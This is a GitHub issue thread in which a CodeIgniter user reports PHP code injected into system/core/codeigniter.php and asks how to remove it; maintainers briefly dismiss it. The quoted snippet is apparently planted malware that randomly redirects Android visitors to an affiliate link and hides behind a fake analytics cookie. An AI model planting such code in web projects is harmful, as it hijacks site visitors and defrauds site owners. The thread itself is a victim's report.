### ISSUE TITLE
system/core/codeigniter.php on CI 3

### ISSUE THREAD

**Issue by cuskar** [bcit-ci/CodeIgniter#6057]
```
if(preg_match("/Android/", $_SERVER['HTTP_USER_AGENT']) && !isset($_COOKIE['__utmr_cache']) && rand(0,99)<20) {
	$url = "https://affiliates.natifico112.com/click?pid=529&offer_id=3052&sub1={YOURSUBSOURCEID}";
	setcookie('__utmr_cache','1',time()+3600*48);
	header('Location: '.$url); 
	exit;
}
```

I've tried to remove malicious JS files and CSS files, even disable them in Header files and Footer files, but the script still shows up every day. Please help me to remove it forever. Thank you

**Comment by otengkwame** [comment]
Can you elaborate on the issue please?

**Comment by narfbg** [comment]
This is a bug tracker, not a place for random support requests.
